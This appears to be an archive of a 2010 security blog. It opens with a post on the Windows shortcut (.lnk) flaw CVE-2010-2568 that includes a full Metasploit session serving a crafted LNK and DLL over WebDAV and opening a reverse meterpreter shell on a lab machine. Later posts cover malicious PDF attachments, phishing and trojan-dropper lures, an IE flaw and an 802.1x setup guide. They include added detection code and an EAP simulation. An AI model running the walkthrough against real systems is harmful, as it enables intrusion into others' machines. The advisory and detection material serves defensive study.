On 16th July 2010, researchers found a new "shortcut" to pwning remote systems in an unusual way. They crafted a way to exploit Windows shortcut files, commonly referred to as .lnk files, in order to gain unauthorized access to a remote computer.

The user need not even click the shortcut file; if s/he merely views it in Explorer, that’s it… Game Over!! Interesting, right?

Let’s dig deeper to know the exact cause of this shortcut to pwnage ;)

Vulnerability:

There exists an unpatched vulnerability (CVE-2010-2568) in the Windows .lnk (shortcut) and .pif file parser code. Windows automatically executes the malicious code when a specially crafted .lnk/.pif file is read by Windows Explorer or any other similar application that displays icons for shortcuts. This vulnerability can be exploited locally from USB drives, over a network share, or even from remote WebDAV locations.

As this vulnerability is not related to buffer overflows, memory corruption or the like, ASLR and Protected Mode will not help in avoiding exploitation. All versions of the Windows OS are affected by this vulnerability.

Exploitation:

According to AV vendor VirusBlokAda, this vulnerability is already being exploited in the wild, and they have seen fully patched Windows 7 machines getting infected by a worm exploiting this vulnerability. See the references for the complete document on the worm analysis.

After successful exploitation of the vulnerability, the worm sends the message “SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!” to the Windows debugger.

Metasploit has also just released an exploit module for this attack which uses a WebDAV location as the attack vector. We will have a complete demonstration of this exploit in the pwnage section.

Workarounds/Mitigation:

Microsoft is asking end users to apply the following registry workaround to disable icons from being displayed in the Windows shell. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

  • Open RegEdit
  • Locate HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler
  • Change the value from {00021401-0000-0000-C000-000000000046} to “”
  • Locate HKEY_CLASSES_ROOT\piffile\shellex\IconHandler
  • Change the value from {00021401-0000-0000-C000-000000000046} to “”
  • Close RegEdit.
  • Restart explorer.exe or reboot Windows.

Disabling the WebClient service will also help protect systems from attacks using the WebDAV attack vector.

Pwnage demo:

Let’s look at this demo on pwning a Windows XP box using Metasploit. In this demo, Metasploit serves a malicious Windows share over WebDAV containing a specially crafted .lnk file and a malicious .dll file that holds the actual payload, and redirects victims to it.

As soon as this share on the attacker’s box is read by the victim’s shell (Windows Explorer in our case), the specially crafted .lnk file causes the payload .dll to be loaded into the address space of the victim’s explorer.exe process, which runs the payload and gives the attacker a shell.

Following are the steps an attacker follows to exploit this vulnerability.

msf > use exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_windows_shell_lnk_execute) > ifconfig
[*] exec: ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:73:7b:ff
          inet addr:192.168.146.128  Bcast:192.168.146.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe73:7bff/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:502 errors:0 dropped:0 overruns:0 frame:0
          TX packets:36 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:50019 (50.0 KB)  TX bytes:5554 (5.5 KB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:16 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:960 (960.0 B)  TX bytes:960 (960.0 B)

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.146.128
LHOST => 192.168.146.128
msf exploit(ms10_xxx_windows_shell_lnk_execute) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   URIPATH  /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.146.128  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.146.128
SRVHOST => 192.168.146.128
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.146.128:4444
[*]
[*] Send vulnerable clients to \\192.168.146.128\ncSTz\
[*]
[*] Using URL: http://192.168.146.128:80/
[*] Server started.
msf exploit(ms10_xxx_windows_shell_lnk_execute) > [*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/desktop.ini
[*] Sending 404 for /ncSTz/desktop.ini ...
[*] Sending LNK file to 192.168.146.129:1035 ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/wwPSnSJ.dll.manifest
[*] Sending 404 for /ncSTz/wwPSnSJ.dll.manifest ...
[*] Sending DLL payload 192.168.146.129:1035 ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/wwPSnSJ.dll.123.Manifest
[*] Sending 404 for /ncSTz/wwPSnSJ.dll.123.Manifest ...
[*] Sending stage (748032 bytes) to 192.168.146.129
[*] Meterpreter session 1 opened (192.168.146.128:4444 -> 192.168.146.129:1039) at Wed Jul 21 00:11:19 +0530 2010

msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -l

Active sessions
===============

  Id  Type         Information                                      Connection
  --  ----         -----------                                      ----------
  1   meterpreter  VICTIM-AJG5DLK5\Administrator @ VICTIM-AJG5DLK5  192.168.146.128:4444 -> 192.168.146.129:1039

msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VICTIM-AJG5DLK5
OS      : Windows XP (Build 2600, ).
Arch    : x86
Language: en_US

GAME OVER!!!
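The request sequence in the session above is also what a defender sees on the server or proxy side. The following Python, added here as an example and not part of the original post or of Metasploit, walks a constructed access log in a hypothetical "client method path status" format and reports any client that fetched a shortcut and then a .dll from the same WebDAV directory, the pattern an icon render on an unpatched host produces.

```python
import posixpath
import re

# Constructed sample access log (hypothetical "client method path status" format),
# modelled on the request sequence the Metasploit session above shows.
SAMPLE_LOG = """\
192.168.146.129 OPTIONS / 200
192.168.146.129 PROPFIND /ncSTz 301
192.168.146.129 PROPFIND /ncSTz/ 207
192.168.146.129 PROPFIND /ncSTz/desktop.ini 404
192.168.146.129 GET /ncSTz/shortcut.lnk 200
192.168.146.129 PROPFIND /ncSTz/wwPSnSJ.dll.manifest 404
192.168.146.129 GET /ncSTz/wwPSnSJ.dll 200
10.0.0.5 GET /docs/report.pdf 200
10.0.0.7 GET /share/readme.lnk 200
10.0.0.7 GET /share/readme.txt 200
this line is malformed and must be skipped
"""

LINE_RE = re.compile(r"^(?P<client>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$")

# Both extensions go through the vulnerable icon handler (lnkfile and piffile in the registry).
SHORTCUT_EXTS = (".lnk", ".pif")


def parse_log(text):
    """Yield (client, method, path, status) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["client"], m["method"], m["path"], int(m["status"])


def find_shortcut_dll_chains(text):
    """Report clients that fetched a shortcut and then a .dll from the same directory.

    The PROPFIND on desktop.ini is Explorer enumerating the folder, the shortcut
    fetch is the icon being rendered, and the .dll fetch right after it is the
    library load the crafted shortcut triggers on an unpatched host. A client
    that only fetches a shortcut is ordinary browsing and is not reported.
    """
    seen_shortcut = {}  # (client, directory) -> shortcut path fetched earlier
    alerts = []
    for client, method, path, status in parse_log(text):
        if method != "GET" or status != 200:
            continue
        key = (client, posixpath.dirname(path))
        lower = path.lower()
        if lower.endswith(SHORTCUT_EXTS):
            seen_shortcut[key] = path
        elif lower.endswith(".dll") and key in seen_shortcut:
            alerts.append({
                "client": client,
                "share": key[1],
                "shortcut": seen_shortcut[key],
                "dll": path,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_shortcut_dll_chains(SAMPLE_LOG):
        print("possible CVE-2010-2568 trigger:", alert)
```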

Following is the video demonstration of above attack using Metasploit.


References:

16 May 2010

Beware of Embedded PDF Malwares

Author: Abhijeet | Filed under: Information Security, Malware Techniques

Last month security researcher Didier Stevens published a PoC PDF file which had an executable embedded inside it. Though the Metasploit framework already has an attack module to embed any executable inside a PDF file, the approach used by Didier Stevens is different and does not involve the use of JavaScript.

As JavaScript is not used, disabling JavaScript in the PDF viewer will not help. PDF viewers like Adobe Reader and Foxit Reader do not allow embedded binary files to be executed directly, yet the “/Launch /Action” PDF commands ultimately run an executable. A Launch action is used to run an application or to open or print a document.

When the PoC was tested in Adobe Acrobat Reader, the following warning box was displayed.

Stevens is also able to control the message displayed in the warning message box. Stevens said Adobe’s PDF Reader will block the file from automatically opening, but he warned that an attacker could use social engineering tricks to get users to allow the file to be opened. Foxit Reader is even worse and opens the file without any warning.

Attacker controlled warning message

Stevens tested his research on Adobe Reader 9.3.1 (Windows XP SP3 and Windows 7).

PoC tested in my test environment

Two weeks back, security researchers started seeing emails claiming to be from Royal Mail with an attached PDF file. This PDF file has another attachment within itself named “Royal_Mail_Delivery_Notice.pdf”, and that inner file contained, quite obviously, a compressed executable.

This new trick is used to install the Zeus bot on the victim’s computer once they open the attachment. The PDF uses the JavaScript function exportDataObject to save the attachment on the computer and, once saved, uses a Launch action to launch the saved copy of the executable.

Having an updated or the latest version of Adobe or Foxit Reader will not protect you from this attack, as the attackers are not exploiting any vulnerability to install the bot on the system; rather, they are making use of the legitimate PDF specification.

The only way to protect yourself from such an attack is to disable the option that allows non-PDF attachments to be opened.

Workaround for Acrobat users

Beware of such emails and do not open PDF attachments originating from untrusted sources.
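To check a PDF for the ingredients this attack relies on, here is a small scanner in Python, added as an example and not from Didier Stevens or the original post. It counts the Launch, embedded-file, JavaScript and exportDataObject markers after decoding the #xx hex escapes that PDF names may use, and flags compressed object streams it cannot see into; the two PDFs it scans are constructed test inputs.

```python
import re

# Constructed test inputs (not real samples). SUSPECT_PDF carries an embedded file
# plus a Launch action whose name is hex-escaped (/#4Caunch == /Launch), an evasion
# that a naive substring search misses; BENIGN_PDF is a plain one-page document.
SUSPECT_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /Names << /EmbeddedFiles 5 0 R >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /Type /Action /S /#4Caunch /Win << /F (dropper.exe) >> >> endobj
5 0 obj << /Names [(Royal_Mail_Delivery_Notice.pdf) 6 0 R] >> endobj
6 0 obj << /Type /Filespec /F (Royal_Mail_Delivery_Notice.pdf) /EF << /F 7 0 R >> >> endobj
7 0 obj << /Type /EmbeddedFile /Length 0 >> stream
endstream
endobj
trailer << /Root 1 0 R >>
%%EOF
"""

BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Keywords worth counting, and what each one means for this attack.
INDICATORS = {
    b"/Launch": "Launch action: runs an application or opens/prints a document",
    b"/EmbeddedFile": "embedded file stream (an attachment carried inside the PDF)",
    b"/OpenAction": "action that fires as soon as the document is opened",
    b"/JavaScript": "JavaScript action",
    b"/JS": "inline JavaScript",
    b"exportDataObject": "JavaScript call that saves an attachment to disk",
    b"/ObjStm": "object stream: compressed objects this scanner cannot look into",
}


def normalize_names(data):
    """Decode #xx hex escapes inside PDF names (/#4Caunch -> /Launch)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def count_indicators(data):
    """Count each indicator as a whole token, so /EmbeddedFiles is not taken for /EmbeddedFile."""
    data = normalize_names(data)
    return {key: len(re.findall(re.escape(key) + rb"(?![A-Za-z])", data))
            for key in INDICATORS}


def assess(counts):
    """'suspicious' for a Launch action, or an attachment plus script that could drop it;
    'opaque' when objects hide in compressed object streams; otherwise 'clean'."""
    if counts[b"/Launch"]:
        return "suspicious"
    script = counts[b"/JS"] or counts[b"/JavaScript"] or counts[b"exportDataObject"]
    if counts[b"/EmbeddedFile"] and script:
        return "suspicious"
    if counts[b"/ObjStm"]:
        return "opaque"
    return "clean"


def scan_pdf(data):
    counts = count_indicators(data)
    return assess(counts), counts


if __name__ == "__main__":
    for label, pdf in (("suspect", SUSPECT_PDF), ("benign", BENIGN_PDF)):
        verdict, counts = scan_pdf(pdf)
        print(label, verdict, [INDICATORS[k] for k, n in counts.items() if n])
```

An "opaque" verdict means the file must be decompressed (or opened with a parser that inflates object streams) before the counts mean anything.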


For the past few days, I have been getting fraudulent emails impersonating HDFC and IDBI banks. The emails looked pretty legitimate unless you looked into the email headers or actually visited the link provided in them.

Below are some screenshots of the emails that I received. You may also see the brief investigation I did to make sure those emails were indeed phishing emails.

Confirm your ip address: HDFC bank phishing

If you have a close look at the IP addresses mentioned in the email, you will find an IP address starting with 812.xxx.xxx.xxx ;) (no octet of an IPv4 address can exceed 255). Normal computer users are usually not very tech savvy and hence might think those IP addresses are correct.

Clicking the provided link leads to a URL which has now been taken down: hxxp://unions.lk/images/randomimage/hdfcpage/hdfcpage/hd.php

Classic IDBI phishing attack email

Following is a screenshot of the phishing email I received requesting me to change my net banking password, even though I am not an IDBI customer.

Classic phishing email requesting you to change your net banking password

Now, to check the authenticity of this email, I checked the email headers and found out that the email originated from

psmtp30.wxs.nl [195.121.247.32]

residing in the Netherlands. This is really suspicious, as the Industrial Development Bank of India Limited (IDBI) does not have any network in the Netherlands :)

Email headers from the IDBI phishing email

A simple lookup of the mail servers for the real IDBI.com revealed the following mail server information.

Real IDBI mail servers

Please beware of such emails.

We have seen financial institutions in the US, UK and Brazil getting targeted by phishers and spammers, but it looks like they are now targeting Indian banks as well.

Following are the precautionary measures that you can take:

1) Do not open emails from unknown people, even though they appear to be coming from a hot chick ;)

2) Always verify the browser address bar and make sure it belongs to the domain it claims to be

3) Do not fill in personal details unless you are confident about the authenticity of the target website

4) Always ascertain that you are entering details on a website guarded by a trusted digital certificate authority like VeriSign, Thawte etc.

5) If unsure, contact the bank and make sure the received email is legitimate.

Such emails are usually used as a stepping stone for carrying out numerous attacks like gathering credit card/personal information, carrying out identity theft, planting malware on the victim’s computer etc.

I hope this entry will be helpful. Till then Stay safe :)

Yesterday, I got an email saying some company has filed a lawsuit against me in court, with a link to download a Word file supposedly containing the copyright law violations.
As expected, it turned out to be a very sophisticated social engineering attack. When I downloaded the file and scanned it in VirusTotal, very few antiviruses were able to detect it.
I thought of analysing it today and, guess what, my Microsoft Security Essentials, which had no clue yesterday about the suspicious .doc file, has detected it as a trojan dropper malware and removed it. Damn, I should have taken a backup of it :(

Security Essentials detecting the malware

Anyway, following are some of the surface details about the piece of malware.

File size : 76827 bytes
File type : Rich Text Format data, version 1, ANSI
MD5       : 6db76304a2aff6bef94364b86abd8b7f
SHA1      : 14451211a50d6ef71b4c2a24601607471f52a7ef

The malware is also detected under the following names (note that they all point to an RTF file carrying an embedded executable, which is what the .doc actually is):

  • Mal/RtfExe-A
  • RTF.EmbedEXE.Gen
  • TR/Dropper.Gen
  • Trojan.Dropper.Gen
  • Suspicious.Insight

Please don’t fall prey to such emails. Please do not download & open documents received from unknown/untrusted sources.

If you find this file [r439875.doc] on your system, then

  • Delete the file
  • Scan your computer with updated anti-virus software.
  • Update and install latest MS Word patches.

Following is the email text used in the social engineering attack.

March 25, 2010
Marcus Law Center
350 Broadway, Suite 300
New York, NY 10013

To Whom It May Concern:

On the link bellow is a copy of the lawsuit that we filed against you in court on March 15, 2010.
Currently the Pretrail Conference is scheduled for April 15th, 2010 at 10:00 A.M. in courtroom #12.
The case number is 3478254. The reason the lawsuit was filed was due to a completely inadequate response
from your company for copyright infrigement that our client Danilison Inc is a victim of.
http://www.marcuslawcenter.com/s/r439875.doc [removed]

Danilison Inc has proof of multiple Copyright Law violations that they wish to present in court on April 15th, 2010.

Sincerely,
Marcus Law Center
Marcus Law Center LLP

References:

  1. Virus Total Result

The dust from IE Aurora had not even settled in our minds and yet another critical vulnerability in IE has emerged with a bang!!

A security consultant from CORE Security Technologies, Mr. Jorge Luis Alvarez Medina, discussed a vulnerability at the BlackHat DC 10 conference. His presentation demonstrated proof of concept code which exploits this vulnerability and allows an attacker to access any file from the victim’s machine.

Medina chained a “Bypassing URL Security Zone feature” attack with browser file sharing protocol attacks and showed how easy it is to read a file from a known location.

Medina further said that these vulnerabilities are weak Internet Explorer features that leave an open door for different kinds of attacks.

Microsoft has acknowledged the vulnerability and issued a security advisory.

Microsoft has also confirmed that Restricted sites zone helps mitigate attacks that could try to exploit this vulnerability by preventing Active Scripting and ActiveX controls from being used when reading HTML e-mail messages. However, if a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.

According to the advisory, Protected Mode in Internet Explorer on Windows Vista and later limits the impact of the vulnerability, while the risk is highest for IE users running Windows XP or who have disabled the browser’s Protected Mode feature.

Core security group has released a white paper on “Abusing insecure features of IE” which demonstrates the internals of the exploitation process.

References:

  1. Microsoft Security Advisory 980088
  2. Internet Explorer turns your personal computer into a public file server
  3. Internet Explorer URL Zone Security Bypass
  4. Download White Paper from Core Security Group

To avoid physical security breaches and unauthorized access from publicly available network ports lying in lobbies or reception areas, companies use port-based authentication schemes.
Once implemented, a device needs to authenticate itself with the authentication server to prove its identity and, once proven, gets access to the network. This provides an authentication mechanism for devices wishing to attach to a LAN port.
These implementations are more common in wireless access points; however, nowadays wired networks are also taking their fair share.
I will break up this tutorial into two parts:

  1. Setting up 802.1x authentication in a wired VoIP network.
  2. Breaking port-based authentication to gain unauthorized access.

Some Basic Theory:

802.1X provides port-based authentication, which involves communications between a supplicant, authenticator, and authentication server.

The supplicant is often software on a client device, such as a laptop, the authenticator is a wired Ethernet switch or wireless access point, and an authentication server is generally a RADIUS database.
The authenticator acts like a security guard to a protected network. The supplicant (i.e., client device) is not allowed access through the authenticator to the protected side of the network until the supplicant’s identity is authorized.

With 802.1X port-based authentication, the supplicant provides credentials, such as user name / password or digital certificate, to the authenticator, and the authenticator forwards the credentials to the authentication server for verification.

If the credentials are valid (in the authentication server database), the supplicant (client device) is allowed to access resources located on the protected side of the network.
If the authenticating server accepts the request, the authenticator sets the port to the “authorized” mode and normal traffic is allowed.

When the supplicant logs off, it sends an EAP-logoff message to the authenticator. The authenticator then sets the port to the “unauthorized” state, once again blocking all non-EAP traffic.
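The exchange described above, as an added example that is not part of the original post: a Python simulation of the three parties running EAP-MD5, with the packet layout from RFC 3748 and the response hash from RFC 1994. The phone identity SEP001122334455, its secret and the server name "acs" are constructed values; the port stays unauthorized until the server answers with EAP-Success.

```python
import hashlib
import hmac
import os
import struct

# EAP codes and method types (RFC 3748). The EAP-MD5 response value is
# computed as in CHAP (RFC 1994): MD5(Identifier || secret || challenge).
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
TYPE_IDENTITY, TYPE_MD5_CHALLENGE = 1, 4


def eap_pack(code, ident, type_data=b""):
    # EAP packet: Code(1) Identifier(1) Length(2, whole packet) Type-Data.
    return struct.pack("!BBH", code, ident, 4 + len(type_data)) + type_data


def eap_unpack(pkt):
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if length != len(pkt):
        raise ValueError("EAP length field does not match packet size")
    return code, ident, pkt[4:]


def md5_response_value(ident, secret, challenge):
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()


class Supplicant:
    """The IP phone: knows its identity and the EAP-MD5 shared secret set on it."""

    def __init__(self, identity, secret):
        self.identity, self.secret = identity, secret

    def handle(self, request):
        code, ident, data = eap_unpack(request)
        if code != EAP_REQUEST or not data:
            return None
        if data[0] == TYPE_IDENTITY:
            return eap_pack(EAP_RESPONSE, ident, bytes([TYPE_IDENTITY]) + self.identity)
        if data[0] == TYPE_MD5_CHALLENGE:
            challenge = data[2:2 + data[1]]  # Value-Size byte, then the challenge
            value = md5_response_value(ident, self.secret, challenge)
            # Response type-data: Type, Value-Size, Value, Name (our identity).
            return eap_pack(EAP_RESPONSE, ident,
                            bytes([TYPE_MD5_CHALLENGE, len(value)]) + value + self.identity)
        return None


class RadiusServer:
    """Authentication server holding the user database (identity -> secret)."""

    def __init__(self, users):
        self.users = users
        self.pending = {}  # identity -> (identifier, challenge) awaiting a response

    def handle(self, response):
        code, ident, data = eap_unpack(response)
        if code != EAP_RESPONSE or not data:
            return eap_pack(EAP_FAILURE, ident)
        if data[0] == TYPE_IDENTITY:
            identity = data[1:]
            if identity not in self.users:
                return eap_pack(EAP_FAILURE, ident)
            challenge = os.urandom(16)  # fresh per attempt, so an old response cannot be replayed
            next_ident = (ident + 1) & 0xFF
            self.pending[identity] = (next_ident, challenge)
            return eap_pack(EAP_REQUEST, next_ident,
                            bytes([TYPE_MD5_CHALLENGE, len(challenge)]) + challenge + b"acs")
        if data[0] == TYPE_MD5_CHALLENGE:
            value, identity = data[2:2 + data[1]], data[2 + data[1]:]
            expected_ident, challenge = self.pending.pop(identity, (None, None))
            if challenge is None or expected_ident != ident:
                return eap_pack(EAP_FAILURE, ident)
            expected = md5_response_value(ident, self.users[identity], challenge)
            ok = hmac.compare_digest(expected, value)
            return eap_pack(EAP_SUCCESS if ok else EAP_FAILURE, ident)
        return eap_pack(EAP_FAILURE, ident)


class Authenticator:
    """The switch port: relays EAP between phone and server and gates the port."""

    def __init__(self, server):
        self.server = server
        self.port_authorized = False  # unauthorized: only EAPOL frames get through

    def authenticate(self, supplicant):
        msg = eap_pack(EAP_REQUEST, 1, bytes([TYPE_IDENTITY]))  # EAP-Request/Identity
        for _ in range(8):  # bounded so a misbehaving supplicant cannot loop forever
            reply = supplicant.handle(msg)
            if reply is None:
                break
            msg = self.server.handle(reply)
            code, _, _ = eap_unpack(msg)
            if code in (EAP_SUCCESS, EAP_FAILURE):
                self.port_authorized = code == EAP_SUCCESS
                return self.port_authorized
        self.port_authorized = False
        return False


# Constructed identity/secret pair standing in for the phone's device ID and EAP-MD5 secret.
USERS = {b"SEP001122334455": b"phone-secret"}

if __name__ == "__main__":
    phone = Supplicant(b"SEP001122334455", b"phone-secret")
    print("port authorized:", Authenticator(RadiusServer(USERS)).authenticate(phone))
```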

The basic authentication transaction is shown in the adjacent diagram.
We will set up port-based authentication using the following supplicant, authenticator and authentication server.

  • Supplicant: Cisco Unified IP Phone 7961G-GE
  • 802.1x Authenticator: Cisco Catalyst 3560 (WS-C3560G-24PS)
  • Radius Server: CiscoSecure ACS 4.1

I will not go through the whole installation and configuration procedure of all the above mentioned devices. I hope you already have same or equivalent devices in your network. Here we will cover only needed configuration steps.

Radius Server Configuration:

  • Once the Cisco ACS 4.1 server is successfully installed, one can do the administrative tasks.
  • The first task is to set up the authenticator.
  • Click on Network Configuration in the left pane.
  • Add your authenticator details as shown in the following screenshots, including the shared secret of the authenticator.
  • Click on the Submit+Apply button.
  • Now add the users to authenticate in the user database.
  • Click on User Setup: the first button in the left pane.
  • Add the username in the input box and click on Add.
  • You can find the username in the phone’s security settings.
  • Under the user setup form, enter the shared secret (password) for the device. This password will be used as the authentication secret by the phone.
  • Repeat the above steps for all the devices present in the network.

802.1x Authenticator:

  • Log in to the switch and go to configure mode.
  • Under config mode, use the following CLI commands to enable the authenticator functionality.
WS-C3560G-24PS(config)# aaa authentication dot1x default group radius
WS-C3560G-24PS(config)# radius-server host <ipAddr_Radius_Server> auth-port 1645 acct-port 1646 key <sharedsecret with radius server>
  • Now configure the switch Ethernet interfaces for 802.1x authentication using the following sequence of CLI commands

WS-C3560G-24PS(config)#interface GigabitEthernet0/7
WS-C3560G-24PS(config-if)#dot1x pae authenticator
WS-C3560G-24PS(config-if)#dot1x port-control auto
WS-C3560G-24PS(config-if)#dot1x violation-mode protect
WS-C3560G-24PS(config-if)#dot1x timeout reauth-period 20
WS-C3560G-24PS(config-if)#dot1x reauthentication
WS-C3560G-24PS(config-if)#end
WS-C3560G-24PS(config)# write mem

Supplicant Configuration:

I am using a Cisco 7961G IP Phone as the supplicant here. All the configuration steps mentioned here are the same for all Cisco IP Phones supporting the 802.1x authentication supplicant.

  • Unlock the phone configuration by pressing *##*
  • Once unlocked, go to Options and the “Security Configuration” menu.
  • Scroll down till you come across the 802.1x Authentication sub-menu.
  • Select “Device Authentication” and change it to “Enabled”. By default, Device Authentication is Disabled.
  • Now select the “EAP-MD5” sub-menu and configure the “shared secret” for authentication which we configured in the RADIUS server.
  • Refer to the adjacent screenshots for more details.
  • Save the configuration and reboot the phone.

If everything is set up fine on all three tiers, then you will see the phone getting an IP address after successful 802.1x authentication.

The following Wireshark capture depicts a typical conversation between the supplicant and the authenticator.

Wireshark trace

If any other device tries to connect itself to the same Ethernet port, it will get challenged by the authenticator. Devices that fail to respond correctly to the challenge will be blocked from accessing services on the wired LAN.

This mechanism is fair enough to stop some physical security breaches. In the next part, we’ll see how this port-based authentication can be hacked to gain unauthorized access to a wired network implementing the EAP-MD5 802.1x authentication mechanism.
Stay tuned…

30 Jan 2010

Apple iPad SEO poisoning attack

Author: Abhijeet | Filed under: General Talks, Information Security, Web Security

What is SEO?

Search engine optimization (SEO) is the process of improving the volume or quality of traffic to a web site. As an internet marketing strategy, webmasters edit the HTML content to increase its relevance to popular keywords, thereby raising the ranking of their websites.

SEO techniques can be broadly categorized under white hat and black hat techniques.
Wikipedia says

“A search engine optimization technique is considered white hat SEO if it conforms to the search engines’ guidelines and involves no deception while Black hat SEO attempts to improve rankings in ways that are disapproved of by the search engines, or involve deception. One black hat technique uses text that is hidden, either as text colored similar to the background, in an invisible iframe tag.”

SEO poisoning attacks are primarily attacks on popular websites that make use of hidden iframe tags. An attacker creates a fake web page with proper SEO and, using hidden iframes, redirects web browsers to rogue websites.

The recently released Apple iPad is being used as bait for a black hat SEO poisoning attack.

When you search with keywords such as “Apple ipad”, “Apple tablet”, “Apple tablet announcement” or “Apple ipad rumor” on Google or any search engine, the results yield websites which may compromise your system.

SEO Poisoned URL

Search Engine Optimization (SEO) poisoning pushes the infected URLs to the top of the search results, thus increasing the chance of a user clicking the malicious URL.
Hypothetically, if a user clicks such a URL from a search result, he gets redirected to a malicious website posing as a fake anti-virus or fake video codec download.

Fake infection warning

For instance, when I clicked on one such link, I was redirected to a website pretending to be an antivirus product which “freely” scanned my laptop online and displayed a bunch of virus infections.

Virus Infection summary from my system

After the scan, website also popped up a message box asking me to fix the problems. As soon as I clicked on the message box, a rogue antivirus software installer was downloaded on my system.

Fake AV software installer

After installation of this so-called antivirus, it performed a complete scan of my system and displayed numerous problems which even my fully updated commercial antivirus software was unable to find. When asked to fix the discovered problems, it invited me to purchase the full version of the software for a discounted price of $69. ;)

Beware of such websites !!!

Conclusion:

No anti-virus software ever does free online scanning and displays infections on your screen. These are just sophisticated social engineering techniques used by malicious hackers to fool users.

Cyber criminals are targeting popular and controversial events and harvesting keywords to perform SEO poisoning attacks. They tend to catch the attention of users who then get trapped in this vicious circle. The Tiger Woods story is one such incident that was turned into a mountain out of a molehill.

So, all that glitters is not gold; use your own head ;)


29 Jan 2010

Lit up your iPhone

Author: bughira | Filed under: General Talks, Uncategorized, iPhone

Smule released a super cool app for the iPhone on 16th Sept that can actually simulate a real lighter.
Just flick on the iPhone and tilt the screen to enjoy the flame reactions. Sonic Lighter truly demonstrates the power of the accelerometer and sound frameworks.

The best feature of Sonic Lighter is that it can light up another iPhone. The utility emits a sound from the speaker, and once you put your Sonic Lighter near another iPhone, it will light up the flame in the Sonic Lighter application installed on the other iPhone. Isn’t that cool?

Sonic Lighter is available on the App Store for only 99 cents.
The adjacent image shows typical usage examples.

Here is a small video showing Sonic Lighter in Action.


OK, we know from the previous post that the malware is trying to connect to testirc1.sh1xy2bg.NET. To learn more about its intentions, I added a fake DNS entry in the XP hosts file and pointed testirc1.sh1xy2bg.NET to my BackTrack 3 machine. I then rebooted the live analysis machine and started Wireshark again on the BT3 system.

